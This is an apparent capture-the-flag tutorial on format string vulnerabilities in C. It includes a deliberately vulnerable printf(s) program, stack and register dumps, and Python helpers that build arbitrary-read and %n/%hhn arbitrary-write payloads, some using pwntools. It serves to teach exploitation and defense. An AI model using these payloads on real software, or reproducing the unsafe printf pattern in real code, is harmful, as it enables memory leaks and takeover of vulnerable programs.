Format string vulnerability
Introduction to format strings
Common format string functions
Function | Description |
---|---|
printf | Output to stdout |
fprintf | Output to the specified FILE stream |
vprintf | Output to stdout, taking the arguments as a va_list |
vfprintf | Output to the specified FILE stream, taking the arguments as a va_list |
sprintf | Output to a string |
snprintf | Output at most the specified number of bytes to a string |
vsprintf | Output to a string, taking the arguments as a va_list |
vsnprintf | Output at most the specified number of bytes to a string, taking the arguments as a va_list |
Common format string form
%[parameter][flags][field width][.precision][length]type
- parameter: n$, selects the n-th parameter after the format string
- field width: the minimum width of the output
- precision: the maximum number of characters output for %s (for integer types, the minimum number of digits)
- length: the size of the corresponding argument
  - hh: one byte (char)
  - h: two bytes (short)
- type
  - d/i: signed integer
  - u: unsigned integer
  - x/X: hexadecimal
  - o: octal
  - s: string; outputs the bytes at the address given by the argument, up to the first NUL byte
  - c: a single character of type char
  - p: void * type; outputs the argument as a pointer value. printf("%p", a) prints the value of variable a in address format, and printf("%p", &a) prints the address of variable a.
  - n: outputs nothing; instead writes the number of characters output so far to the variable pointed to by the corresponding integer pointer argument.
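To make the field layout above concrete, here is a minimal sketch of a parser that splits a format string into its conversion specifications. The regular expression and the name `parse_conversions` are illustrative assumptions, not part of any library; the flag characters and the length modifiers beyond hh and h (l, ll, j, z, t, L) come from the C standard rather than from the list above.

```python
import re

# One group per field of %[parameter][flags][field width][.precision][length]type
CONVERSION = re.compile(
    r"%(?:(?P<parameter>\d+)\$)?"
    r"(?P<flags>[-+ #0]*)"
    r"(?P<width>\d+|\*)?"
    r"(?:\.(?P<precision>\d+|\*))?"
    r"(?P<length>hh|h|ll|l|j|z|t|L)?"
    r"(?P<type>[diuoxXscpn%])"
)

def parse_conversions(fmt):
    """Return one dict per conversion found in fmt (fields that are absent are None)."""
    return [m.groupdict() for m in CONVERSION.finditer(fmt)]

for spec in parse_conversions("%6$08x and %7$hhn"):
    print(spec)
```

Running it on `%6$08x and %7$hhn` shows how `6$` and `7$` end up in the parameter field while `hh` is parsed as the length, which is exactly the combination the later exploitation steps rely on.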
Principle verification
Sample program:
    #include <stdio.h>

    int main() {
        char s[100] = "aaaa.%p.%p.%p.%p.%p.%p.%p";
        printf(s);  /* vulnerable: s is used directly as the format string */
        return 0;
    }
32 bit
Compile command:
gcc test.c -g -m32 -o test
Output result:
aaaa.0xf7ffc988.0xffffcf2a.0x56555595.0xffffcf2a.0xf7ffc984.0x61616161.0x2e70252e
Stack structure:
    00:0000│ esp 0xffffcee0 —▸ 0xffffcef8 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
    01:0004│     0xffffcee4 —▸ 0xf7ffc988 (_rtld_global_ro+136) ◂— 0x8e
    02:0008│     0xffffcee8 —▸ 0xffffcf2a ◂— 0x0
    03:000c│     0xffffceec —▸ 0x56555595 (main+24) ◂— add ebx, 0x1a3f
    04:0010│     0xffffcef0 —▸ 0xffffcf2a ◂— 0x0
    05:0014│     0xffffcef4 —▸ 0xf7ffc984 (_rtld_global_ro+132) ◂— 0x6
    06:0018│ eax 0xffffcef8 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
From top to bottom, these are parameters 0 to 6. Parameter 0 is the address of the format string, and the first 4 bytes of the format string are read as parameter 6 (the exact index depends on the stack layout of the program). Therefore, if a target address is placed at the right position inside the format string, the data at that address can be read or written.
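The parameter walk can be reproduced offline. The sketch below is only a model, not the real printf: it rebuilds the seven stack words from the dump (entries 01 to 05, followed by the buffer s) and fetches parameters 1 to 7 the way a 32-bit printf would, one 4-byte little-endian word per %p. The helper name `nth_parameter` is made up for this illustration.

```python
import struct

fmt = b"aaaa.%p.%p.%p.%p.%p.%p.%p\x00"

# Stack entries 01..05 from the dump, followed by the buffer s itself.
words = [0xf7ffc988, 0xffffcf2a, 0x56555595, 0xffffcf2a, 0xf7ffc984]
stack = b"".join(struct.pack("<I", w) for w in words) + fmt

def nth_parameter(stack, n):
    """Return parameter n (n >= 1) as a 32-bit little-endian word."""
    start = (n - 1) * 4
    return struct.unpack("<I", stack[start:start + 4])[0]

# Same values as the program output above, without the leading "aaaa."
print(".".join(hex(nth_parameter(stack, n)) for n in range(1, 8)))
```

Parameter 6 comes out as 0x61616161, the bytes "aaaa", and parameter 7 as 0x2e70252e, the bytes ".%p." that follow them in the buffer.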
64 bit
Compile command:
gcc test.c -g -m64 -o test
Output result:
aaaa.0x7fffffffde78.0x70.0x555555554770.0x7ffff7dced80.0x7ffff7dced80.0x2e70252e61616161.0x70252e70252e7025
Register:
    RAX 0x0
    RBX 0x0
    RCX 0x555555554770 (__libc_csu_init) ◂— push r15
    RDX 0x70
    RDI 0x7fffffffdd20 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
    RSI 0x7fffffffde78 —▸ 0x7fffffffe21b
    R8  0x7ffff7dced80 (initial) ◂— 0x0
    R9  0x7ffff7dced80 (initial) ◂— 0x0
    R10 0x0
    R11 0x0
    R12 0x5555555545a0 (_start) ◂— xor ebp, ebp
    R13 0x7fffffffde70 ◂— 0x1
    R14 0x0
    R15 0x0
    RBP 0x7fffffffdd90 —▸ 0x555555554770 (__libc_csu_init) ◂— push r15
    RSP 0x7fffffffdd20 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
    RIP 0x555555554747 (main+157) ◂— call 0x555555554580
Stack structure:
    00:0000│ rdi rsp 0x7fffffffdd20 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
    01:0008│         0x7fffffffdd28 ◂— '%p.%p.%p.%p.%p.%p'
    02:0010│         0x7fffffffdd30 ◂— '.%p.%p.%p'
    03:0018│         0x7fffffffdd38 ◂— 0x70 /* 'p' */
    04:0020│         0x7fffffffdd40 ◂— 0x0
A 64-bit program passes the first six function parameters in the rdi, rsi, rdx, rcx, r8 and r9 registers, and any further parameters are pushed onto the stack in order. Parameter 0 (rdi) is the format string itself, so the first five %p outputs are the values of rsi, rdx, rcx, r8 and r9, and the sixth output is the first stack slot. Here the buffer sits at the top of the stack, so the first eight bytes of the format string are read as parameter 6.
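The register-then-stack rule can be written down as a small lookup. This is a sketch under two assumptions that are not stated in the text: only integer and pointer parameters are considered (floating-point values travel in separate registers), and rsp is taken at the moment of the call instruction. The name `parameter_location` is hypothetical.

```python
import struct

REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def parameter_location(n):
    """Where parameter n of printf lives at the call (n = 0 is the format string)."""
    if n < len(REGS):
        return REGS[n]
    # Parameters past the sixth sit on the stack, 8 bytes apart, starting at rsp.
    return "[rsp+0x%x]" % ((n - len(REGS)) * 8)

for n in range(8):
    print(n, parameter_location(n))

# Decoding the sixth and seventh %p outputs recovers the start of the format string.
print(struct.pack("<Q", 0x2e70252e61616161))
print(struct.pack("<Q", 0x70252e70252e7025))
```

The two decoded values are the bytes `aaaa.%p.` and `%p.%p.%p`, which matches the stack dump: parameter 6 is the slot at rsp and parameter 7 the slot at rsp+8.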
Leak memory
Leak stack variable memory
Leak the value of a stack variable
Get the value on the stack that is treated as the (n+1)-th parameter of printf (counting the format string as the first): %n$x
Note: %x prints an unsigned int in hexadecimal, which is 32 bits (4 bytes); in a 64-bit program the value is truncated to its low 32 bits. %p always matches the pointer width of the program, so %p is recommended.
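The truncation is easy to see on a value taken from the 64-bit run. The two helpers below are illustrative stand-ins for what the conversions print, not real printf calls; the special case where glibc prints a null pointer as `(nil)` is deliberately ignored.

```python
def as_percent_x(value):
    """Model of %x: the argument is read as a 32-bit unsigned int."""
    return format(value & 0xFFFFFFFF, "x")

def as_percent_p(value):
    """Model of %p for a non-null pointer: full width with a 0x prefix."""
    return hex(value)

leaked = 0x7fffffffde78  # value of rsi in the 64-bit example
print(as_percent_x(leaked))
print(as_percent_p(leaked))
```

With %x the upper half of the stack address is lost, which makes the leak useless for computing other addresses.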
Leak the contents at the address stored in a stack variable
Get the contents at the address stored in the (n+1)-th parameter of printf (counting the format string as the first): %n$s
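In practice several slots are usually leaked in one request and the result is searched for a known marker to find the index of the buffer. The sketch below assumes the leak is a dot-separated list of %p outputs, as in the sample program; `probe` and `parse_leak` are names invented for this example.

```python
def probe(count):
    """Build a format string that leaks parameters 1..count with %n$p."""
    return ".".join("%{}$p".format(i) for i in range(1, count + 1))

def parse_leak(output):
    """Turn a dot-separated %p leak into a list of integers."""
    values = []
    for token in output.split("."):
        # glibc prints a null pointer as "(nil)"
        values.append(0 if token == "(nil)" else int(token, 16))
    return values

print(probe(3))

# The 32-bit output from the sample program, without the leading "aaaa."
leak = "0xf7ffc988.0xffffcf2a.0x56555595.0xffffcf2a.0xf7ffc984.0x61616161.0x2e70252e"
offset = parse_leak(leak).index(0x61616161) + 1
print(offset)
```

The index found this way (6 for the 32-bit sample) is the parameter number at which attacker-controlled bytes start.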
Leak arbitrary address memory
Get the contents at the address addr, where the bytes of addr are placed in the format string so that they are read as the k-th parameter: addr%k$s
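A minimal sketch of building such a read payload with only the standard library follows. The 64-bit variant is an addition to the text: 64-bit addresses normally contain NUL bytes, which would end the format string early, so the address is placed after the conversion instead. The function names, the 16-byte region reserved for the format part, and the sample addresses are all assumptions made for the illustration.

```python
import struct

def read_payload_32(addr, k):
    """addr%k$s: the address is at the start of the buffer, which is parameter k."""
    return struct.pack("<I", addr) + b"%" + str(k).encode() + b"$s"

def read_payload_64(addr, base, region=16):
    """%k$s first, padded to `region` bytes, then the address.

    base is the parameter index of the start of the buffer, so the address
    lands at parameter base + region // 8.
    """
    k = base + region // 8
    fmt = b"%" + str(k).encode() + b"$s"
    return fmt.ljust(region, b"A") + struct.pack("<Q", addr)

print(read_payload_32(0x0804a028, 6))
print(read_payload_64(0x601018, 6))
```

In the 64-bit payload the padding bytes are printed after the leaked string, so the receiver has to strip them.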
Overwrite memory
Note: %n writes through a pointer, so it can only overwrite the memory that a parameter points to, not the parameter values themselves. For a program running with ASLR enabled, a stack address must be leaked first before a value on the stack can be overwritten.
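The pointer semantics of %n can be modeled with a very small simulator. This is a deliberately limited sketch, not a printf implementation: it only understands literal text, %Nc padding, and positional %k$n, %k$hn and %k$hhn, and it does not handle %%. The name `simulate_writes` is made up for this example.

```python
import re

SPEC = re.compile(rb"%(?:(\d+)\$)?(\d+)?(hh|h)?([cn])")

def simulate_writes(fmt, args):
    """Return {address: (value, size_in_bytes)} for each %n-style conversion.

    args[i - 1] is parameter i. The parameters are only read, never modified.
    """
    written = 0   # number of characters output so far
    pos = 0
    writes = {}
    for m in SPEC.finditer(fmt):
        written += m.start() - pos        # literal bytes before this conversion
        pos = m.end()
        index, width, length, conv = m.groups()
        if conv == b"c":
            written += int(width or 1)    # %Nc outputs N characters
            continue
        if index is None:
            raise ValueError("only positional %k$n is modeled")
        size = {b"hh": 1, b"h": 2, None: 4}[length]
        addr = args[int(index) - 1]       # the parameter is used as a pointer
        writes[addr] = (written % (1 << (8 * size)), size)
    return writes

print(simulate_writes(b"aa%2$n", [0x1000, 0x2000]))
print(simulate_writes(b"%300c%1$hhn", [0x1000]))
```

The first call stores 2 at address 0x2000, the location parameter 2 points to; the second stores 300 mod 256 = 44 as a single byte at 0x1000.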
Generating a payload with pwntools
For format string payloads, pwntools provides the fmtstr module, which includes a FmtStr class that can be used directly. For details, see http://docs.pwntools.com/en/stable/fmtstr.html. The function used most often is
fmtstr_payload(offset, {address:data}, numbwritten=0, write_size='byte')
- offset: the parameter index at which the start of the format string is read
- numbwritten: the number of characters that have already been output before the payload
- write_size: the write granularity, one of byte, short or int, corresponding to hhn, hn and n. The default is byte, that is, writing with hhn.
Note: some challenges impose a time limit that makes the payload generated by pwntools unusable. This can usually be worked around by overwriting only the low bytes of the target to reduce the amount of output, in which case the payload has to be constructed manually.
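A short usage sketch of fmtstr_payload follows. The offset 6 is taken from the 32-bit sample above, while the target address 0x0804a028 and the value 0x12345678 are placeholders chosen for the illustration. The import is guarded so that the snippet still runs where pwntools is not installed, in which case no payload is produced.

```python
try:
    from pwn import context, fmtstr_payload
except ImportError:  # pwntools is not installed
    fmtstr_payload = None

def build(offset, addr, value):
    """Return a payload writing value to addr, or None without pwntools."""
    if fmtstr_payload is None:
        return None
    context.clear(arch="i386")  # 32-bit target: 4-byte addresses
    return fmtstr_payload(offset, {addr: value}, numbwritten=0, write_size="byte")

payload = build(6, 0x0804a028, 0x12345678)
print(payload)
```

The exact bytes depend on the pwntools version, so it is worth printing the payload and checking its length against any input limit of the target.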
Manually construct a payload
Overwriting with small numbers
For values smaller than the machine word size, putting the address at the front of the format string does not work: the address bytes alone already make the output count at least as large as the word size (4 on 32-bit, 8 on 64-bit), which exceeds the value to be written. The address therefore has to be placed after the conversion.
Take writing the number 2 as an example: aa%k$n[padding][addr]
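The layout aa%k$n[padding][addr] can be generated as follows. In this sketch the format part is given a fixed 16-byte region so that k does not depend on how many digits it has; that region size, the padding byte and the function name are assumptions for the example. `base` is the parameter index at which the start of the buffer is read (6 in the samples above).

```python
import struct

def small_write_payload(value, addr, base, word=4, region=16):
    """Write a small value with %n, keeping the address after the conversion."""
    k = base + region // word            # parameter index where addr will land
    fmt = b"a" * value + b"%" + str(k).encode() + b"$n"
    if len(fmt) > region:
        raise ValueError("format part does not fit in the reserved region")
    packed = struct.pack("<I" if word == 4 else "<Q", addr)
    # The padding comes after %n, so it does not change the value written.
    return fmt.ljust(region, b"A") + packed

print(small_write_payload(2, 0x0804a028, 6))
print(small_write_payload(2, 0x601018, 6, word=8))
```

For the 32-bit case the address sits 16 bytes into the buffer, four words past parameter 6, hence %10$n.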
Overwriting with large numbers
Outputting a very large number of characters in one go takes too long, so a large value has to be split into several parts that are written separately, for example one byte at a time with hhn or two bytes at a time with hn.
Take writing a 32-bit number with hhn as an example. The payload has the form: [addr][addr+1][addr+2][addr+3][pad1]%k$hhn[pad2]%(k+1)$hhn[pad3]%(k+2)$hhn[pad4]%(k+3)$hhn
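The pads can be computed mechanically: each one is a %Nc conversion that raises the output count so that, modulo 256, it equals the next byte to write. The sketch below assumes a 32-bit target, that the four addresses start at parameter k, and that none of them contains a NUL or % byte; the function name and the sample address and value are illustrative.

```python
import struct

def hhn_payload_32(addr, value, k):
    """[addr][addr+1][addr+2][addr+3] followed by one %hhn write per byte of value."""
    payload = b"".join(struct.pack("<I", addr + i) for i in range(4))
    written = len(payload)               # 16 bytes are output before the first pad
    for i in range(4):
        target = (value >> (8 * i)) & 0xFF
        pad = (target - written) % 256   # characters needed to reach target mod 256
        if pad:
            payload += b"%" + str(pad).encode() + b"c"
            written += pad
        payload += b"%" + str(k + i).encode() + b"$hhn"
    return payload

print(hhn_payload_32(0x0804a028, 0x12345678, 6))
```

For 0x12345678 the bytes are written in the order 0x78, 0x56, 0x34, 0x12; since each is smaller than the previous one, every pad after the first wraps around and needs 222 characters.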